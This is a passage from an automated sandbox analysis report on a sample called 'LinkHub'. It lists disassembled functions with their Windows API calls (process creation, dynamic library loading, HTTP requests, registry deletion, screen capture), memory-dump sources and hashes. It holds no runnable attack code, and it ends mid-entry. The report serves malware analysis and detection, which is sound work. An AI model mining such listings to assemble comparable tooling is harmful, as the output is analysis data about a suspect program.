                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0028BE16
                                                                                        • GetLastError.KERNEL32(00000000), ref: 0028BE67
                                                                                        • CloseHandle.KERNEL32(?), ref: 0028BE99
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0028BEAA
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0028BEBC
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0028BECE
                                                                                        • CloseHandle.KERNEL32(?), ref: 0028BF43
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2178637699-0
                                                                                        • Opcode ID: 5ade794fd528176876d0474244c532816aa39717ef1895e8ee4d96467ddefb2c
                                                                                        • Instruction ID: b41c6b24bd2c10e32e6df8d3ff071c059d690a3111c889a77f97a7f2fe8f61a3
                                                                                        • Opcode Fuzzy Hash: 5ade794fd528176876d0474244c532816aa39717ef1895e8ee4d96467ddefb2c
                                                                                        • Instruction Fuzzy Hash: 93F1CD75525301AFC715EF24C891B6ABBE1AF84314F18895DF8898B2E2CB70EC65CF52
                                                                                        Function 00284A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0029DCD0), ref: 00284B18
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00284B2A
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0029DCD0), ref: 00284B4F
                                                                                        • FreeLibrary.KERNEL32(00000000,?,0029DCD0), ref: 00284B9B
                                                                                        • StringFromGUID2.OLE32(?,?,00000028,?,0029DCD0), ref: 00284C05
                                                                                        • SysFreeString.OLEAUT32(00000009), ref: 00284CBF
                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00284D25
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00284D4F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                        • API String ID: 354098117-199464113
                                                                                        • Opcode ID: 94c22220322c1424bb5090c78fa41e0541b5f97b36424474d09627779612b016
                                                                                        • Instruction ID: 829772deb7146c47f5245e576e5a4fdbad4750674a47d3ce1c1474d5d354ee35
                                                                                        • Opcode Fuzzy Hash: 94c22220322c1424bb5090c78fa41e0541b5f97b36424474d09627779612b016
                                                                                        • Instruction Fuzzy Hash: 80127D75A11206EFDB14EF54C888EAEB7B9FF45308F148099F9099B291C731ED52CBA0
                                                                                        Function 0020381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetMenuItemCount.USER32(002D29C0), ref: 00243F72
                                                                                        • GetMenuItemCount.USER32(002D29C0), ref: 00244022
                                                                                        • GetCursorPos.USER32(?), ref: 00244066
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 0024406F
                                                                                        • TrackPopupMenuEx.USER32(002D29C0,00000000,?,00000000,00000000,00000000), ref: 00244082
                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0024408E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                        • String ID: 0
                                                                                        • API String ID: 36266755-4108050209
                                                                                        • Opcode ID: 9a66fb3f336623b043d48e5eef3128d0b2a56f3c74e34e6c81d2d02c9a81bf2b
                                                                                        • Instruction ID: 8b14382351edf1850843adb337efdbed9211fc81fc0a4ade75ee270b33b016e3
                                                                                        • Opcode Fuzzy Hash: 9a66fb3f336623b043d48e5eef3128d0b2a56f3c74e34e6c81d2d02c9a81bf2b
                                                                                        • Instruction Fuzzy Hash: 9071F530654306BAEB25DF28DC49FAABF68FF05364F104216F5146A1D1C7B1AD34DB50
                                                                                        Function 00297711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(00000000,?), ref: 00297823
                                                                                          • Part of subcall function 00208577: _wcslen.LIBCMT ref: 0020858A
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00297897
                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002978B9
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002978CC
                                                                                        • DestroyWindow.USER32(?), ref: 002978ED
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00200000,00000000), ref: 0029791C
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00297935
                                                                                        • GetDesktopWindow.USER32 ref: 0029794E
                                                                                        • GetWindowRect.USER32(00000000), ref: 00297955
                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0029796D
                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00297985
                                                                                          • Part of subcall function 00202234: GetWindowLongW.USER32(?,000000EB), ref: 00202242
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                        • String ID: 0$tooltips_class32
                                                                                        • API String ID: 2429346358-3619404913
                                                                                        • Opcode ID: 9b3266ea0bd8f6fd02550ee808bde07883395368e944ec243568aa0612016910
                                                                                        • Instruction ID: aff9d7424e60b9d8ccaaec4f67e777b95020107bb65e4c569c1a0860ba41ceb8
                                                                                        • Opcode Fuzzy Hash: 9b3266ea0bd8f6fd02550ee808bde07883395368e944ec243568aa0612016910
                                                                                        • Instruction Fuzzy Hash: A5718870528345AFEB25CF58DC48FAABBF9FB89300F14445EF989872A1C770A916DB11
                                                                                        Function 0020146D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00201802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00201488,?,00000000,?,?,?,?,0020145A,00000000,?), ref: 00201865
                                                                                        • DestroyWindow.USER32(?), ref: 00201521
                                                                                        • KillTimer.USER32(00000000,?,?,?,?,0020145A,00000000,?), ref: 002015BB
                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 002429B4
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0020145A,00000000,?), ref: 002429E2
                                                                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0020145A,00000000,?), ref: 002429F9
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0020145A,00000000), ref: 00242A15
                                                                                        • DeleteObject.GDI32(00000000), ref: 00242A27
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                        • String ID: <)-
                                                                                        • API String ID: 641708696-3551069816
                                                                                        • Opcode ID: d0c9084239243a1047780c685e456725ee374a79b48ba7db724bc42b2b46aa9f
                                                                                        • Instruction ID: 7e1fb8b4dda8a866c12c49f17a4e5ab5451e74827ca329dc7958f618c91625b8
                                                                                        • Opcode Fuzzy Hash: d0c9084239243a1047780c685e456725ee374a79b48ba7db724bc42b2b46aa9f
                                                                                        • Instruction Fuzzy Hash: 61618C30921712DFDB398F15E958B69BBB1FB90312FA0411AE4424B6B1C770ACB9DF44
                                                                                        Function 0027CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0027CEF5
                                                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0027CF08
                                                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0027CF1C
                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0027CF35
                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0027CF78
                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0027CF8E
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0027CF99
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0027CFC9
                                                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0027D021
                                                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0027D035
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0027D040
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                        • String ID:
                                                                                        • API String ID: 3800310941-3916222277
                                                                                        • Opcode ID: 3c1b217869dcc4904c9b530f37f47546749c88cfd40aafa70c8c7f5331f24ed4
                                                                                        • Instruction ID: 08f3ecaf7647dd2dd04c956d2e804de441cc64820f71bbf43e4edabccc29c966
                                                                                        • Opcode Fuzzy Hash: 3c1b217869dcc4904c9b530f37f47546749c88cfd40aafa70c8c7f5331f24ed4
                                                                                        • Instruction Fuzzy Hash: C9519EB1510605BFDB219FB0DD88AABBBBCFF08344F10841EF94986210D734D965AB61
                                                                                        Function 00298FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,002966D6,?,?), ref: 00298FEE
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,002966D6,?,?,00000000,?), ref: 00298FFE
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,002966D6,?,?,00000000,?), ref: 00299009
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,002966D6,?,?,00000000,?), ref: 00299016
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00299024
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,002966D6,?,?,00000000,?), ref: 00299033
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0029903C
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,002966D6,?,?,00000000,?), ref: 00299043
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002966D6,?,?,00000000,?), ref: 00299054
                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,002A0C04,?), ref: 0029906D
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0029907D
                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0029909D
                                                                                        • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 002990CD
                                                                                        • DeleteObject.GDI32(00000000), ref: 002990F5
                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0029910B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                        • String ID:
                                                                                        • API String ID: 3840717409-0
                                                                                        • Opcode ID: e2c4c123b2e67b2e83fe781e74cfb33a0e49e1a7e5ef447b0fa899c555070c56
                                                                                        • Instruction ID: 8dfcd14373811538fe142b0749895abf9835ba22befa620b8368f7e720e23b81
                                                                                        • Opcode Fuzzy Hash: e2c4c123b2e67b2e83fe781e74cfb33a0e49e1a7e5ef447b0fa899c555070c56
                                                                                        • Instruction Fuzzy Hash: 7B414975600209BFDB219F69EC8CEAE7BB8FF89721F10405AF919D7260D7709941DB20
                                                                                        Function 0028C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                          • Part of subcall function 0028D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0028C10E,?,?), ref: 0028D415
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D451
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D4C8
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D4FE
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0028C154
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0028C1D2
                                                                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 0028C26A
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0028C2DE
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0028C2FC
                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0028C352
                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0028C364
                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 0028C382
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0028C3E3
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0028C3F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                        • API String ID: 146587525-4033151799
                                                                                        • Opcode ID: 80fa6f6ee4d33993c7d6d8ce302f49752641263d241872a5d331eca839138f58
                                                                                        • Instruction ID: 9ab4da65e5f5b3404b75d19f19df783b8034f9e592d7b38c6ad4e850c58500cd
                                                                                        • Opcode Fuzzy Hash: 80fa6f6ee4d33993c7d6d8ce302f49752641263d241872a5d331eca839138f58
                                                                                        • Instruction Fuzzy Hash: FBC16B34225302AFD710EF64C485F2ABBE5AF84314F64849DF45A8B6E2CB71E856CF91
                                                                                        Function 0029A94F Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 271windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0029A990
                                                                                        • GetSystemMetrics.USER32(00000011), ref: 0029A9A7
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 0029A9B3
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0029A9C9
                                                                                        • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 0029AC15
                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0029AC33
                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0029AC54
                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 0029AC73
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0029AC95
                                                                                        • DefDlgProcW.USER32(?,00000005,?), ref: 0029ACBB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                        • String ID: @$(-
                                                                                        • API String ID: 3962739598-2144042105
                                                                                        • Opcode ID: 154f2cd29c89361d8832e496140fefecd6c5d81989dd9f9c752439ff683e5f3f
                                                                                        • Instruction ID: e9eb0353798632c65dc3703bdabead8db1e8079224ba59b7c86bc5b62731c325
                                                                                        • Opcode Fuzzy Hash: 154f2cd29c89361d8832e496140fefecd6c5d81989dd9f9c752439ff683e5f3f
                                                                                        • Instruction Fuzzy Hash: 3FB18C3151031ADFDF14CF68C9897AE7BB2BF44705F14806AEC49AF295D770A9A0CB91
                                                                                        Function 0029976A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002997B6
                                                                                        • GetFocus.USER32 ref: 002997C6
                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 002997D1
                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00299879
                                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0029992B
                                                                                        • GetMenuItemCount.USER32(?), ref: 00299948
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00299958
                                                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0029998A
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 002999CC
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002999FD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                        • String ID: 0$(-
                                                                                        • API String ID: 1026556194-2476977234
                                                                                        • Opcode ID: 00e187c99926abb0bc5f25a0b453354c0f9f4c42e98028f7db768093f08a317c
                                                                                        • Instruction ID: eb5f34443f0525e287821a1f75d57ee14f29640d67108ac8554a4b2aebef002a
                                                                                        • Opcode Fuzzy Hash: 00e187c99926abb0bc5f25a0b453354c0f9f4c42e98028f7db768093f08a317c
                                                                                        • Instruction Fuzzy Hash: 9581D5715243029FDB10CF28D888AAB7BE8FF89324F14091EF98597291D771D995CFA2
                                                                                        Function 00282FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00283035
                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00283045
                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00283051
                                                                                        • SelectObject.GDI32(00000000,?), ref: 0028305E
                                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 002830CA
                                                                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00283109
                                                                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0028312D
                                                                                        • SelectObject.GDI32(?,?), ref: 00283135
                                                                                        • DeleteObject.GDI32(?), ref: 0028313E
                                                                                        • DeleteDC.GDI32(?), ref: 00283145
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00283150
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                        • String ID: (
                                                                                        • API String ID: 2598888154-3887548279
                                                                                        • Opcode ID: 6ade88dfa7605df8ef07733806672318ce86668525a6e314ab95bfcf43442be0
                                                                                        • Instruction ID: e33be8b3b232b9d24d94d68749071a4f247e3863561b3847bb1b8a7498d95790
                                                                                        • Opcode Fuzzy Hash: 6ade88dfa7605df8ef07733806672318ce86668525a6e314ab95bfcf43442be0
                                                                                        • Instruction Fuzzy Hash: 6B611475D10219EFCF04DFA4D888EAEBBB5FF48710F20841AE559A7250D771A911DF90
                                                                                        Function 002652AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 002652E6
                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00265328
                                                                                        • _wcslen.LIBCMT ref: 00265339
                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00265345
                                                                                        • _wcsstr.LIBVCRUNTIME ref: 0026537A
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 002653B2
                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 002653EB
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00265445
                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00265477
                                                                                        • GetWindowRect.USER32(?,?), ref: 002654EF
                                                                                        Strings
